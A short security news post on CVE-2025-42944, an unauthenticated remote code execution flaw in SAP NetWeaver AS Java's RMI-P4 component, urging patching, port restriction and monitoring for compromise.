A new critical bug has been discovered in SAP NetWeaver AS Java, identified as CVE-2025-42944. This flaw exists in a component called RMI-P4, which handles remote method calls. The issue happens because of insecure deserialization, meaning the system accepts harmful data and executes it. Attackers can exploit this flaw to send malicious code that the server unknowingly runs.
The most concerning part is that this attack needs no login or password. Anyone with network access to the vulnerable service can exploit it. The attacker doesn’t need to authenticate or be inside the network. Once the bug is triggered successfully, the attacker can run any command on the underlying operating system, giving them full control over the affected server.
SAP has rated this issue as “HotNews,” its highest alert category, and assigned it the maximum CVSS severity score of 10.0. The company included the fix for this vulnerability in its October 2025 Security Patch Day release. The update provides patches and configuration changes to secure the RMI-P4 service and block unauthorized access.
This vulnerability is particularly dangerous for companies whose SAP NetWeaver servers are connected to the internet. If the RMI-P4 port is exposed publicly, attackers can reach it directly and exploit the flaw remotely. Even internal systems could be targeted if malware or insider threats have network access to the service. It is important to remember that the issue can spread fast once a single exposed system is compromised.
Security experts have warned that organizations must act quickly. The first step is to apply SAP’s official patches immediately. Delaying the update leaves servers open to full compromise. Until patching is completed, administrators should block or restrict external access to the RMI-P4 port using firewalls or network filters to reduce exposure.
Teams should also review server activity for any suspicious behavior. This includes looking for unusual code execution, new files or users being created, or abnormal Java processes. Monitoring tools and security logs should be checked regularly. If possible, affected systems should be isolated from the wider network to prevent potential spread or data theft.
Experts have emphasized that this is not a theoretical threat it’s a real and serious one. Attackers are known to scan for SAP servers exposed online, and similar vulnerabilities in the past were quickly used to install backdoors and steal information. Because this flaw requires no login, it drastically lowers the barrier for exploitation.
In short, CVE-2025-42944 is a severe, unauthenticated remote code execution bug that allows attackers to take over SAP NetWeaver servers completely. Organizations running SAP NetWeaver AS Java must patch immediately, block the vulnerable service if patching isn’t possible, and closely monitor for signs of compromise. Acting fast could be the difference between prevention and a full system breach.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news
